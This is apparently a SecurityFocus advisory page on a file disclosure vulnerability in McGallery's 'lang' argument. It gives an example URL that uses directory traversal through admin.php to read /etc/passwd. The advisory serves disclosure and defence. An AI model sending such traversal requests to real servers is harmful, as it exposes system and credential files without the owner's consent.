info
discussion
exploit
solution
references
McGallery Lang Argument File Disclosure Vulnerability
This issue may be exploited with a Web broswer. The following example was provided:
http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus